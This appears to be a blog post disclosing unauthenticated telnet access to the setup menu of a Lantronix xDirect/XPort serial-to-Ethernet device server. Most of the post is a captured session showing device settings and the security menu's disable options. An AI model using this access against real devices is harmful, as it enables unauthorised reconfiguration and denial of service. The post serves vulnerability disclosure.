Lantronix xDirect Serial-to-Ethernet Server / XPort Unauthenticated Access

The Lantronix xDirect Serial-to-Ethernet device server allows unauthenticated access to TCP port 9999 which lets an attacker configure the device, gain information about and disable services resulting in a denial of service. For the device tested it was running XPort 6.6.0.2.

df:/tmp/ # telnet 192.168.1.10
Trying 192.168.1.10…
Connected to 192.168.1.10.
Escape character is ‘^]’.

MAC address 00204AC975EE
Software version V6.6.0.2 (080926) XPTEXE

Press Enter for Setup Mode

*** basic parameters
Hardware: Ethernet TPI
IP addr 192.168.1.10, gateway 192.168.1.1,netmask 255.255.255.0
DNS Server not set

*** Security
SNMP is enabled
SNMP Community Name: public
Telnet Setup is enabled
TFTP Download is enabled
Port 77FEh is enabled
Web Server is enabled
Web Setup is enabled
ECHO is disabled
Enhanced Password is disabled
Port 77F0h is enabled

*** Channel 1
Baudrate 38400, I/F Mode 4C, Flow 00
Port 10001
Connect Mode : C0
Send ‘+++’ in Modem Mode enabled
Show IP addr after ‘RING’ enabled
Auto increment source port disabled
Remote IP Adr: — none —, Port 00000
Disconn Mode : 00
Flush Mode : 00

*** Expert
TCP Keepalive : 45s
ARP cache timeout: 600s
CPU performance: Regular
Monitor Mode @ bootup : enabled
RS485 tx enable : active low
HTTP Port Number : 80
SMTP Port Number : 25
MTU Size: 1400
Alternate MAC: disabled
Ethernet connection type: auto-negotiate

*** E-mail
Mail server: 0.0.0.0
Unit :
Domain :
Recipient 1:
Recipient 2:

– Trigger 1
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 2
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 3
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 6

Disable SNMP (N) ?

SNMP Community Name (public):

Disable Telnet Setup (N) ?

Disable TFTP Firmware Update (N) ?

Disable Port 77FEh (N) ?

Disable Web Server (N) ?

Disable Web Setup (N) ?

Disable ECHO ports (Y) ?

Enable Enhanced Password (N) ?

Disable Port 77F0h (N) ?

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 8

exiting without save !
Connection closed by foreign host.
df:/tmp/ #

Advertisements

Tags: ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: